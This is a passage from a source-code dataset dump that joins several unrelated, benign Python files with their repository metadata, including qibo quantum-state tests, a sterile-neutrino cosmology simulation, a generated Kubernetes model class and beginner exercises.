        probs = state.probabilities(qubits, mgate)
@pytest.mark.parametrize("registers", [None, {"a": (0,), "b": (2,)}])
def test_state_measure(registers):
    """measure() populates samples/frequencies; sampling before it raises."""
    from qibo import gates
    state = states.VectorState.zero_state(4)
    mgate = gates.M(0, 2)
    assert state.measurements is None
    with pytest.raises(RuntimeError):
        samples = state.samples()
    state.measure(mgate, nshots=100, registers=registers)
    # Measuring |0000> always yields 0 on both measured qubits.
    target_samples = np.zeros((100, 2))
    np.testing.assert_allclose(state.samples(), target_samples)
    assert state.frequencies() == {"00": 100}
    if registers is not None:
        target_freqs = {"a": {"0": 100}, "b": {"0": 100}}
    else:
        target_freqs = {"00": 100}
    assert state.frequencies(registers=True) == target_freqs
@pytest.mark.parametrize("registers", [None, {"a": (0,), "b": (2,)}])
def test_state_set_measurements(registers):
    """set_measurements injects raw samples and reshapes them per qubit."""
    from qibo import gates
    state = states.VectorState.zero_state(3)
    # 50 shots of outcome 0 followed by 50 shots of outcome 1 on qubit 2.
    samples = np.array(50 * [0] + 50 * [1])
    state.set_measurements([0, 2], samples, registers)
    target_samples = np.array(50 * [[0, 0]] + 50 * [[0, 1]])
    np.testing.assert_allclose(state.samples(), target_samples)
    assert state.frequencies() == {"00": 50, "01": 50}
    if registers is not None:
        target_freqs = {"a": {"0": 100}, "b": {"0": 50, "1": 50}}
    else:
        target_freqs = {"00": 50, "01": 50}
    assert state.frequencies(registers=True) == target_freqs
def test_state_apply_bitflips():
    """apply_bitflips requires prior measurements; bare call must raise."""
    state = states.VectorState.zero_state(3)
    with pytest.raises(RuntimeError):
        state.apply_bitflips(0.1)
    # Bitflips are tested in measurement tests
@pytest.mark.parametrize("trotter", [True, False])
def test_vector_state_expectation(backend, trotter):
    """<v|H|v> matches a dense numpy computation, with and without normalization."""
    original_backend = qibo.get_backend()
    qibo.set_backend(backend)
    from qibo.hamiltonians import XXZ
    ham = XXZ(nqubits=5, delta=0.5, trotter=trotter)
    matrix = np.array(ham.matrix)
    state = np.random.random(32) + 1j * np.random.random(32)
    norm = np.sum(np.abs(state) ** 2)
    target_ev = np.sum(state.conj() * matrix.dot(state)).real
    state = states.VectorState.from_tensor(state)
    np.testing.assert_allclose(state.expectation(ham), target_ev)
    # Second argument requests division by the state norm.
    np.testing.assert_allclose(state.expectation(ham, True), target_ev / norm)
    qibo.set_backend(original_backend)
@pytest.mark.parametrize("trotter", [True, False])
def test_matrix_state_expectation(backend, trotter):
    """Tr(H rho) matches a dense numpy computation, with and without normalization."""
    original_backend = qibo.get_backend()
    qibo.set_backend(backend)
    from qibo.hamiltonians import TFIM
    ham = TFIM(nqubits=2, h=1.0, trotter=trotter)
    matrix = np.array(ham.matrix)
    state = np.random.random((4, 4)) + 1j * np.random.random((4, 4))
    # Hermitize so the expectation value is real.
    state = state + state.T.conj()
    norm = np.trace(state)
    target_ev = np.trace(matrix.dot(state)).real
    state = states.MatrixState.from_tensor(state)
    np.testing.assert_allclose(state.expectation(ham), target_ev)
    np.testing.assert_allclose(state.expectation(ham, True), target_ev / norm)
    qibo.set_backend(original_backend)
|
[
"35475381+stavros11@users.noreply.github.com"
] |
35475381+stavros11@users.noreply.github.com
|
39018bd8df654c888bf236f792358094e3d6bea6
|
77ae7c76d36009daa01b2317439c1f975f7932b2
|
/exercicios/ex060att.py
|
f43127dd20c9afd7b1bbc847fd39bb8f04294c07
|
[] |
no_license
|
MatheusOldAccount/Exerc-cios-de-Python-do-Curso-em-Video
|
5f26b5a2867fa1a2e36b486a809dfbe8b107b8c2
|
5696c49d3caf5cae817217a2da0598d1cf794f5b
|
refs/heads/master
| 2022-03-22T10:49:33.666660
| 2019-11-25T21:24:43
| 2019-11-25T21:24:43
| 224,052,682
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 321
|
py
|
# Reads an integer and prints its factorial, echoing each factor of the
# product as it is multiplied in (output is byte-identical to the original).
fat = int(input('Digite um número para\ncalcular seu Fatorial: '))
print('Calculando {}! ='.format(fat), end=' ')
resultado = 1
for termo in range(fat, 0, -1):
    if termo == 1:
        print('{} ='.format(termo), end=' ')
    else:
        print('{} x'.format(termo), end=' ')
    resultado *= termo
print('{}'.format(resultado))
|
[
"matheustavares1165@gmail.com"
] |
matheustavares1165@gmail.com
|
adcfd87bb4a72a735c4618f56ed5135b4423a71d
|
7c47e106c9ec85a7239c84c55ad5f20972edefcf
|
/tests/heavy_sterile_dirac_neutrino/__main__.py
|
3d91e82acbdf3d14050992aea89e033d2d9f6408
|
[] |
no_license
|
anasthesia/pyBBN
|
11813717ad5023a9b29f9594ccde93fbc2d5a0c9
|
0e88604b765eb5ce2f196909c65cf2af11a8cc2f
|
refs/heads/master
| 2021-01-21T03:37:46.309318
| 2016-05-10T12:03:50
| 2016-05-10T12:03:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,223
|
py
|
# -*- coding: utf-8 -*-
"""
## Heavy sterile dirac neutrino
$$ M = 33.9 MeV $$
$$ \theta_\tau \approx 4.86 10^{-2} \sim \tau_N \approx 0.3 sec $$
http://arxiv.org/pdf/hep-ph/0002223v2.pdf
<img src="plots.svg" width=100% />
<img src="particles.svg" width=100% />
"""
import os
import argparse
from collections import defaultdict
from particles import Particle
from library.SM import particles as SMP, interactions as SMI
from library.NuMSM import particles as NuP, interactions as NuI
from evolution import Universe
from common import UNITS, Params
# --- CLI: physical parameters of the sterile-neutrino scenario --------------
parser = argparse.ArgumentParser(description='Run simulation for given mass and mixing angle')
parser.add_argument('--mass', default='33.9')
parser.add_argument('--theta', default='0.0486')
parser.add_argument('--tau', default='0.3')
parser.add_argument('--Tdec', default='5')
parser.add_argument('--comment', default='')
args = parser.parse_args()
mass = float(args.mass) * UNITS.MeV
theta = float(args.theta)
lifetime = float(args.tau) * UNITS.s
T_dec = float(args.Tdec) * UNITS.MeV
# Output folder is keyed by the lifetime argument.
folder = os.path.join(os.path.split(__file__)[0], args.tau)
# Temperature grid: start no lower than 50 MeV, evolve down to T_final.
T_initial = max(50. * UNITS.MeV, T_dec)
T_interaction_freezeout = 0.05 * UNITS.MeV
T_final = 0.0008 * UNITS.MeV
params = Params(T=T_initial,
                dy=0.05)
universe = Universe(params=params, folder=folder)
# --- Particle content (cassandra-style commented lines removed upstream) ----
photon = Particle(**SMP.photon)
electron = Particle(**SMP.leptons.electron)
muon = Particle(**SMP.leptons.muon)
neutrino_e = Particle(**SMP.leptons.neutrino_e)
neutrino_mu = Particle(**SMP.leptons.neutrino_mu)
neutrino_tau = Particle(**SMP.leptons.neutrino_tau)
sterile = Particle(**NuP.dirac_sterile_neutrino(mass))
# The sterile neutrino is treated as decoupled from the start.
sterile.decoupling_temperature = T_initial
neutrino_e.decoupling_temperature = 5 * UNITS.MeV
neutrino_mu.decoupling_temperature = 5 * UNITS.MeV
neutrino_tau.decoupling_temperature = 5 * UNITS.MeV
universe.add_particles([
    photon,
    electron,
    muon,
    neutrino_e,
    neutrino_mu,
    neutrino_tau,
    sterile,
])
# Only the tau mixing angle is non-zero in this scenario.
thetas = defaultdict(float, {
    'tau': theta,
})
universe.interactions += (
    SMI.neutrino_interactions(
        leptons=[electron],
        neutrinos=[neutrino_e, neutrino_mu, neutrino_tau]
    ) + NuI.sterile_leptons_interactions(
        thetas=thetas, sterile=sterile,
        neutrinos=[neutrino_e, neutrino_mu, neutrino_tau],
        leptons=[electron, muon]
    )
)
universe.init_kawano(electron=electron, neutrino=neutrino_e)
if universe.graphics:
    from plotting import RadiationParticleMonitor, MassiveParticleMonitor, DensityAndEnergyMonitor
    universe.graphics.monitor([
        (neutrino_e, RadiationParticleMonitor),
        (neutrino_mu, RadiationParticleMonitor),
        (neutrino_tau, RadiationParticleMonitor),
        (sterile, MassiveParticleMonitor),
        (sterile, DensityAndEnergyMonitor)
    ])
# Evolve with interactions until they freeze out, then coast to T_final
# with a finer step and no collision terms.
universe.evolve(T_interaction_freezeout, export=False)
universe.interactions = tuple()
universe.params.dy = 0.0125
universe.evolve(T_final)
"""
### Plots for comparison with articles
### JCAP10(2012)014, Figure 9
<img src="figure_9.svg" width=100% />
### JCAP10(2012)014, Figure 10
<img src="figure_10.svg" width=100% />
<img src="figure_10_full.svg" width=100% />
"""
if universe.graphics:
    from tests.plots import articles_comparison_plots
    articles_comparison_plots(universe, [neutrino_e, neutrino_mu, neutrino_tau, sterile])
# --- Export monitor data as TSV (Python 2: itertools.izip) ------------------
import os
import csv
from itertools import izip
# particles[4] is the (sterile, DensityAndEnergyMonitor) entry registered above.
density_data = universe.graphics.particles[4][1].data[0]
energy_data = universe.graphics.particles[4][1].data[1]
with open(os.path.join(universe.folder, 'normalized_density_plot.dat'), 'w') as f:
    writer = csv.writer(f, delimiter='\t')
    for x, y in izip(*density_data):
        writer.writerow([x, y])
with open(os.path.join(universe.folder, 'normalized_energy_density_plot.dat'), 'w') as f:
    writer = csv.writer(f, delimiter='\t')
    for x, y in izip(*energy_data):
        writer.writerow([x, y])
# particles[3] is the (sterile, MassiveParticleMonitor) regime monitor.
regime_data = universe.graphics.particles[3][1].data[0]
with open(os.path.join(universe.folder, 'sterile_regime_plot.dat'), 'w') as f:
    writer = csv.writer(f, delimiter='\t')
    for x, y in izip(*regime_data):
        writer.writerow([x, y])
|
[
"andrew.magalich@gmail.com"
] |
andrew.magalich@gmail.com
|
099b9d0845f92ff8c2fa69e85d795893a024d24e
|
7087a5dd1772c9456f098bc024a894dcaeef5432
|
/backup/build/new-calkube/kubernetes-6.0.0_snapshot-py2.7.egg/kubernetes/client/models/v1_portworx_volume_source.py
|
611c15aa0788155255a147f5d3ee6c627268a2b7
|
[] |
no_license
|
santhoshchami/kubecctl-python
|
5be7a5a17cc6f08ec717b3eb1c11719ef7653aba
|
cd45af465e25b0799d65c573e841e2acb983ee68
|
refs/heads/master
| 2021-06-23T11:00:43.615062
| 2019-07-10T16:57:06
| 2019-07-10T16:57:06
| 145,669,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,234
|
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.10.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1PortworxVolumeSource(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.

    Model for a Portworx volume attached to a pod (Kubernetes v1 API).
    """

    # Attribute name -> declared swagger type.
    swagger_types = {
        'fs_type': 'str',
        'read_only': 'bool',
        'volume_id': 'str'
    }

    # Attribute name -> JSON key used in the API definition.
    attribute_map = {
        'fs_type': 'fsType',
        'read_only': 'readOnly',
        'volume_id': 'volumeID'
    }

    def __init__(self, fs_type=None, read_only=None, volume_id=None):
        """
        V1PortworxVolumeSource - a model defined in Swagger

        :param fs_type: filesystem type to mount (e.g. "ext4", "xfs").
        :param read_only: when True, forces read-only in VolumeMounts.
        :param volume_id: required Portworx volume identifier.
        """
        self._fs_type = None
        self._read_only = None
        self._volume_id = None
        self.discriminator = None

        if fs_type is not None:
            self.fs_type = fs_type
        if read_only is not None:
            self.read_only = read_only
        # volume_id is mandatory; its setter rejects None.
        self.volume_id = volume_id

    @property
    def fs_type(self):
        """
        Gets the fs_type of this V1PortworxVolumeSource.
        FSType represents the filesystem type to mount Must be a filesystem type supported by the host operating system. Ex. \"ext4\", \"xfs\". Implicitly inferred to be \"ext4\" if unspecified.

        :return: The fs_type of this V1PortworxVolumeSource.
        :rtype: str
        """
        return self._fs_type

    @fs_type.setter
    def fs_type(self, fs_type):
        """
        Sets the fs_type of this V1PortworxVolumeSource.

        :param fs_type: The fs_type of this V1PortworxVolumeSource.
        :type: str
        """
        self._fs_type = fs_type

    @property
    def read_only(self):
        """
        Gets the read_only of this V1PortworxVolumeSource.
        Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts.

        :return: The read_only of this V1PortworxVolumeSource.
        :rtype: bool
        """
        return self._read_only

    @read_only.setter
    def read_only(self, read_only):
        """
        Sets the read_only of this V1PortworxVolumeSource.

        :param read_only: The read_only of this V1PortworxVolumeSource.
        :type: bool
        """
        self._read_only = read_only

    @property
    def volume_id(self):
        """
        Gets the volume_id of this V1PortworxVolumeSource.
        VolumeID uniquely identifies a Portworx volume

        :return: The volume_id of this V1PortworxVolumeSource.
        :rtype: str
        """
        return self._volume_id

    @volume_id.setter
    def volume_id(self, volume_id):
        """
        Sets the volume_id of this V1PortworxVolumeSource.

        :param volume_id: The volume_id of this V1PortworxVolumeSource.
        :type: str
        """
        if volume_id is None:
            raise ValueError("Invalid value for `volume_id`, must not be `None`")
        self._volume_id = volume_id

    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        def _convert(item):
            # Recurse into nested swagger models; pass plain values through.
            return item.to_dict() if hasattr(item, "to_dict") else item

        result = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [_convert(v) for v in value]
            elif isinstance(value, dict):
                result[attr] = {k: _convert(v) for k, v in value.items()}
            else:
                result[attr] = _convert(value)
        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        return isinstance(other, V1PortworxVolumeSource) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
|
[
"root@kube-node02.local"
] |
root@kube-node02.local
|
6424902da0def910bde07cd8f0ed83ed1b17aece
|
f2a18b4a1d759cfd44aff9be13848b4bc03560d8
|
/ex32.py
|
2c577cdcff980c7145146272002e01dbd099382f
|
[] |
no_license
|
5h3rr1ll/LearnPythonTheHardWay
|
1e740b0d4ab71c4c5218599d970001684fa58eea
|
5612f768b8ce93fcc4757e8db128017f00a6c2ea
|
refs/heads/master
| 2021-01-13T05:06:20.749196
| 2017-02-07T19:32:15
| 2017-02-07T19:32:15
| 81,246,206
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 859
|
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-

# Three sample lists: plain numbers, strings, and a mixed-type list.
the_count = [1, 2, 3, 4, 5]
fruits = ["apples", "oranges", "pears", "apricots"]
change = [1, "pennies", 2, "dimes", 3, "quarters"]

# A for-loop visits each element of a list in order.
for count_value in the_count:
    print(f"This is count {count_value}")

# The same idiom works for strings.
for fruit_name in fruits:
    print(f"A fruit of type: {fruit_name}")

# For mixed types, !r (repr) shows each value unambiguously.
for item in change:
    print(f"I got {item!r}")

# Lists can also be built up incrementally.
elements = []
for value in range(0, 6):
    print(f"Adding {value} to the list.")
    elements.append(value)

# And printed back out afterwards.
for value in elements:
    print(f"Element was: {value}")
|
[
"a@sherrill.de"
] |
a@sherrill.de
|
c59b601ebf130c4026f99e5789ac8c4b76a7e310
|
b198ab1d3faf79d34b1745236daa5eb02a37e18e
|
/yggdrasil/metaschema/datatypes/tests/test_ScalarMetaschemaType.py
|
48314f79d334dfd2818bdbb8f4e1a711a6736bc8
|
[
"BSD-3-Clause"
] |
permissive
|
leighmatth/yggdrasil
|
688f13aa0d274217daec9f412269fbbaf5f10aef
|
dcc4d75a4d2c6aaa7e50e75095a16df1df6b2b0a
|
refs/heads/master
| 2021-07-09T10:39:25.422978
| 2021-04-14T16:40:04
| 2021-04-14T16:40:04
| 245,011,886
| 0
| 0
|
NOASSERTION
| 2020-03-04T21:54:25
| 2020-03-04T21:54:24
| null |
UTF-8
|
Python
| false
| false
| 7,355
|
py
|
import copy
import numpy as np
from yggdrasil import units, platform
from yggdrasil.metaschema.datatypes.tests import test_MetaschemaType as parent
from yggdrasil.metaschema.properties.ScalarMetaschemaProperties import (
_valid_types)
class TestScalarMetaschemaType(parent.TestMetaschemaType):
    r"""Test class for ScalarMetaschemaType class with float."""
    _mod = 'ScalarMetaschemaType'
    _cls = 'ScalarMetaschemaType'
    # Default fixture: a 32-bit float scalar stored in a 1-element array.
    _prec = 32
    _type = 'float'
    _shape = 1
    _array_contents = None
    @staticmethod
    def after_class_creation(cls):
        r"""Actions to be taken during class construction.

        Builds the fixture data (valid/invalid encoded and decoded values,
        precision-doubled variants, normalization cases) on the class.
        """
        parent.TestMetaschemaType.after_class_creation(cls)
        if not cls._explicit:
            cls._typedef['subtype'] = cls._type
        # Map the scalar subtype to a numpy dtype string.
        # bytes precision is in bits (8 bits/char); unicode uses 32 bits/char.
        if cls._type == 'bytes':
            dtype = 'S%d' % (cls._prec // 8)
        elif cls._type == 'unicode':
            dtype = 'U%d' % (cls._prec // 32)
        else:
            dtype = '%s%d' % (cls._type, cls._prec)
        if cls._array_contents is None:
            cls._array = np.ones(cls._shape, dtype)
        else:
            cls._array = np.array(cls._array_contents, dtype)
        # An array of a deliberately wrong dtype for negative tests.
        if cls._type in ['bytes', 'unicode']:
            dtype_invalid = 'float'
        else:
            dtype_invalid = 'S10'
        cls._invalid_array = np.ones(cls._shape, dtype_invalid)
        # Scalar classes use element 0 as the value; array classes use the
        # whole array and treat lone elements / wrong ranks as invalid.
        if 'Array' not in cls._cls:
            cls._value = cls._array[0]
            cls._invalid_decoded.append(cls._array)
            cls._invalid_decoded.append(cls._invalid_array[0])
        else:
            cls._value = cls._array
            if cls._array.ndim == 1:
                cls._invalid_decoded.append(cls._array[0])
                cls._invalid_decoded.append(np.ones((3, 4), dtype))
            else:
                cls._invalid_decoded.append(cls._array[0][0])
                cls._invalid_decoded.append(cls._array[0])
            cls._invalid_decoded.append(cls._invalid_array)
        cls._valid_encoded = [{'type': cls.get_import_cls().name,
                               'precision': cls._prec,
                               'units': '',
                               'data': cls._value.tobytes()}]
        if not cls._explicit:
            cls._valid_encoded[0]['subtype'] = cls._type
        cls._valid_decoded = [cls._value]
        # Build a double-precision variant of the value for compatibility tests.
        if cls._type == 'bytes':
            new_dtype = 'S%d' % (cls._prec * 2 // 8)
        elif cls._type == 'unicode':
            new_dtype = 'U%d' % (cls._prec * 2 // 32)
        else:
            new_dtype = '%s%d' % (cls._type, cls._prec * 2)
        # float128 does not exist on Windows numpy builds.
        if platform._is_win and (new_dtype == 'float128'):  # pragma: windows
            cls._prec_value = None
        else:
            prec_array = cls._array.astype(new_dtype)
            if 'Array' not in cls._cls:
                cls._prec_value = prec_array[0]
            else:
                cls._prec_value = prec_array
        cls._compatible_objects = [
            (cls._value, cls._value, None)]
        if cls._prec_value is not None:
            if not cls._explicit:
                cls._compatible_objects.append(
                    (cls._value, cls._prec_value, {'subtype': cls._type,
                                                   'precision': cls._prec * 2}))
            else:
                cls._compatible_objects.append(
                    (cls._value, cls._prec_value, {'precision': cls._prec * 2}))
        # Normalization cases only apply to explicitly typed scalars.
        if 'Array' not in cls._cls:
            if cls._explicit:
                if cls._type == 'bytes':
                    cls._valid_normalize = [(1, b'1'),
                                            (u'1', b'1')]
                elif cls._type == 'unicode':
                    cls._valid_normalize = [(1, u'1'),
                                            (b'1', u'1')]
                else:
                    cls._valid_normalize = [(str(cls._value), cls._value),
                                            ('hello', 'hello')]
        if cls._explicit and ('Array' not in cls._cls):
            cls._invalid_encoded.append({'type': 'scalar',
                                         'subtype': 'invalid'})
            cls._invalid_validate.append(np.array([None, 1, list()],
                                                  dtype=object))
    def test_from_array(self):
        r"""Test getting object from array.

        Adds units to the expected value when the typedef declares them.
        """
        test_val = self._value
        test_kws = {}
        if 'units' in self._typedef:
            test_val = units.add_units(test_val, self._typedef['units'])
            test_kws['unit_str'] = self._typedef['units']
        self.assert_equal(self.instance.from_array(self._array, **test_kws),
                          test_val)
# Dynamically create tests for dynamic and explicitly typed scalars.
# For each valid subtype t, two classes are registered in this module's
# globals: an implicit one (subtype passed via typedef) and an explicit one
# (dedicated <T>MetaschemaType class).
for t in _valid_types.keys():
    iattr_imp = {'_type': t}
    if t == 'complex':
        iattr_imp['_prec'] = 64
    elif t in ('bytes', 'unicode'):
        # String fixtures: precision is sized to the longest sample string.
        iattr_imp['_array_contents'] = ['one', 'two', 'three']
        max_len = len(max(iattr_imp['_array_contents'], key=len))
        if t == 'unicode':
            iattr_imp['_prec'] = max_len * 32
        else:
            iattr_imp['_prec'] = max_len * 8
    iattr_exp = copy.deepcopy(iattr_imp)
    iattr_exp['_cls'] = '%sMetaschemaType' % t.title()
    iattr_exp['_explicit'] = True
    if t == 'float':
        iattr_exp['_prec'] = 64
    cls_imp = type('TestScalarMetaschemaType_%s' % t,
                   (TestScalarMetaschemaType, ), iattr_imp)
    cls_exp = type('Test%s' % iattr_exp['_cls'],
                   (TestScalarMetaschemaType, ), iattr_exp)
    # Register both so the test runner can discover them by name.
    globals()[cls_imp.__name__] = cls_imp
    globals()[cls_exp.__name__] = cls_exp
del cls_imp, cls_exp
class TestScalarMetaschemaType_prec(TestScalarMetaschemaType):
    r"""Test class for ScalarMetaschemaType class with precision."""
    @staticmethod
    def after_class_creation(cls):
        r"""Actions to be taken during class construction.

        Extends the base fixtures with an explicit 'precision' entry in the
        typedef plus encoded variants at compatible and incorrect precisions.
        """
        TestScalarMetaschemaType.after_class_creation(cls)
        cls._typedef['precision'] = cls._prec
        cls._valid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
        for x in cls._invalid_encoded:
            x['precision'] = cls._prec / 2  # compatible precision
        # Version with incorrect precision
        cls._invalid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
        if cls._prec_value is not None:
            cls._invalid_encoded[-1]['precision'] = cls._prec * 2
            cls._invalid_decoded.append(cls._prec_value)
class TestScalarMetaschemaType_units(TestScalarMetaschemaType):
    r"""Test class for ScalarMetaschemaType class with units."""
    @staticmethod
    def after_class_creation(cls):
        r"""Actions to be taken during class construction.

        Adds unit-bearing variants: 'cm' in the typedef, encoded forms with
        compatible units ('cm', 'm'), and one with incompatible units ('s').
        """
        TestScalarMetaschemaType.after_class_creation(cls)
        cls._typedef['units'] = 'cm'
        cls._valid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
        cls._valid_encoded[-1]['units'] = 'cm'
        cls._valid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
        cls._valid_encoded[-1]['units'] = 'm'
        cls._valid_decoded.append(copy.deepcopy(cls._valid_decoded[0]))
        cls._valid_decoded[-1] = units.add_units(cls._valid_decoded[-1], 'm')
        # Version with incorrect units
        cls._invalid_encoded.append(copy.deepcopy(cls._valid_encoded[0]))
        cls._invalid_encoded[-1]['units'] = 's'
|
[
"langmm.astro@gmail.com"
] |
langmm.astro@gmail.com
|
285310cf1d4edc5a1443def90668c7c840468d8e
|
d2c4934325f5ddd567963e7bd2bdc0673f92bc40
|
/tests/model_control/detailed/transf_BoxCox/model_control_one_enabled_BoxCox_PolyTrend_Seasonal_DayOfMonth_ARX.py
|
1d28284256ded9da5f673fdeaad18a79bbde2158
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
jmabry/pyaf
|
797acdd585842474ff4ae1d9db5606877252d9b8
|
afbc15a851a2445a7824bf255af612dc429265af
|
refs/heads/master
| 2020-03-20T02:14:12.597970
| 2018-12-17T22:08:11
| 2018-12-17T22:08:11
| 137,104,552
| 0
| 0
|
BSD-3-Clause
| 2018-12-17T22:08:12
| 2018-06-12T17:15:43
|
Python
|
UTF-8
|
Python
| false
| false
| 164
|
py
|
# Build one ozone-dataset model configuration:
# BoxCox transform + polynomial trend + day-of-month seasonality + ARX cycle.
import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod

testmod.build_model( ['BoxCox'] , ['PolyTrend'] , ['Seasonal_DayOfMonth'] , ['ARX'] );
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
bdbf66f680b1ea39771b59a2f8431b1111cdba9b
|
6eddce1e728afade439a2eae69cb63bcfddd4591
|
/PyCad/ObjectGroup.py
|
4f7fd3b1db3fee0143f779be257de9e2c2adca98
|
[] |
no_license
|
jfu334/PyCad
|
7f4858325b152adbe1e6395d577f9f4fbd8bfe7a
|
29fe2de4b5a26161623c92d2903af7d2241e24c4
|
refs/heads/master
| 2020-11-26T16:56:43.436654
| 2019-12-21T19:43:22
| 2019-12-21T19:43:22
| 229,147,618
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 543
|
py
|
class ObjectGroup:
    """Container that applies geometry operations to every held object.

    Members are expected to expose setColor/copy/translate/rotate
    (duck-typed; nothing is checked up front).
    """

    def __init__(self, *args, color=None):
        # Snapshot the positional arguments into our own list.
        self._objects = list(args)
        if color is not None:
            # Propagate the initial colour to every member.
            for obj in self._objects:
                obj.setColor(color)

    def addObject(self, object_):
        """Append a single object to the group."""
        self._objects.append(object_)

    def objects(self):
        """Return a shallow copy of the member list."""
        return list(self._objects)

    def copy(self):
        """Return a new group holding copies of every member."""
        member_copies = [obj.copy() for obj in self._objects]
        return ObjectGroup(*member_copies)

    def translate(self, x, y, z):
        """Translate every member; returns self for chaining."""
        for obj in self._objects:
            obj.translate(x, y, z)
        return self

    def rotate(self, x, y, z):
        """Rotate every member; returns self for chaining."""
        for obj in self._objects:
            obj.rotate(x, y, z)
        return self
|
[
"you@example.com"
] |
you@example.com
|
9e4f4b0bd91e9881e0c2b65bfc2072e361de6a75
|
0e538d58825dc3862556b5c68227a32b01db6ebf
|
/hackerrank/counter_game.py
|
08e6d478959d8c86fe372faff900043538a182c0
|
[] |
no_license
|
nghiattran/playground
|
ac6f1e724153df4b84b7e1221765dd60638478fd
|
6dfa0b9660ece8d51d439d26afc9d338b1547823
|
refs/heads/master
| 2021-01-12T09:21:03.068081
| 2017-08-06T22:36:29
| 2017-08-06T22:36:29
| 76,141,798
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 379
|
py
|
def solve(n):
turn = 0
while n != 1:
if n & (n - 1) == 0:
n >>= 1
else:
hi = len(bin(n)) - 3
n -= 1 << hi
turn = (turn + 1) % 2
return 'Louise' if turn == 1 else 'Richard'
def test(n, expected):
res = solve(n)
assert res == expected
# n = 1
# expected = 'Richard'
# test(n, expected)
#
# n = 6
# expected = 'Richard'
# test(n, expected)
|
[
"nghiattran3@gmail.com"
] |
nghiattran3@gmail.com
|
46519bfa56ede49cd6af6ad77abced12dc33b167
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4079/codes/1846_1277.py
|
484bb8fd32564afb1a3ff017b573748a9c0be05e
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109
| 2020-05-23T00:24:26
| 2020-05-23T00:24:26
| 266,199,309
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 349
|
py
|
from numpy import*
from numpy.linalg import*
# Symmetric distance table between 7 cities; row/column i corresponds to
# city number 111*(i+1) (see the index arithmetic below).
tab=array ([[0,2,11,6,15,11,1],[2,0,7,12,4,2,15],[11,7,0,11,8,3,13],[6,12,11,0,10,2,1],[15,4,8,10,0,5,13],[11,2,3,2,5,0,14],[1,15,13,1,13,14,0]])
# Prompts are in Portuguese: "enter the number of the 1st/2nd city".
c1= int(input("Digite o numero da 1o cidade: "))
c2=int(input("Digite o numero da 2o cidade: "))
# Cities are numbered 111, 222, ..., 777; map them to indices 0..6.
# NOTE(review): assumes the input is one of those multiples of 111 — confirm.
a= int((c1/111)-1)
b=int((c2/111)-1)
# Look up and print the distance between the two cities.
x=tab[a,b]
print(x)
|
[
"jvlo@icomp.ufam.edu.br"
] |
jvlo@icomp.ufam.edu.br
|
d0cd842e8bb16c6c209c3cc94098b0e03846618e
|
b121b4135f0edf0e39c1ae7343c7df19f56a077f
|
/mysite/yaml_creator/models/deprecated/SingleFlux.py
|
405936402b779d8e5d7652b7830c8ade95feced6
|
[] |
no_license
|
MPIBGC-TEE/bgc-md
|
25379c03d2333481bd385211f49aff6351e5dd05
|
8912a26d1b7e404ed3ebee4d4799a3518f507756
|
refs/heads/master
| 2021-05-08T19:07:46.930394
| 2020-10-21T12:08:53
| 2020-10-21T12:08:53
| 119,548,100
| 3
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
from django.db import models
from . Variable import Variable
#class SingleFlux(models.Model):
class SingleFlux(models.Model):
    """Django model: one directed flux from a source Variable to a target Variable."""
    # Textual expression describing the flux (max 200 chars).
    expr=models.CharField(max_length=200)
    # Variable the flux leaves; reverse accessor 'donating'.
    source=models.ForeignKey('Variable',related_name='donating',on_delete=models.CASCADE)
    # Variable the flux enters; reverse accessor 'receiving'.
    target=models.ForeignKey('Variable',related_name='receiving',on_delete=models.CASCADE)
|
[
"markus.mueller.1.g@googlemail.com"
] |
markus.mueller.1.g@googlemail.com
|
65fe121e163bb535d489ac05df663c58e7ebede3
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2289/60752/278304.py
|
cdacd943998c206e86876081ac33d814c666414b
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 872
|
py
|
class node:
    """Minimal binary-tree node with a value and two child links."""
    val = 0
    left = None
    right = None

    def __init__(self, val, l, r):
        self.val = val
        self.left = l
        self.right = r


def makeTree(s, n):
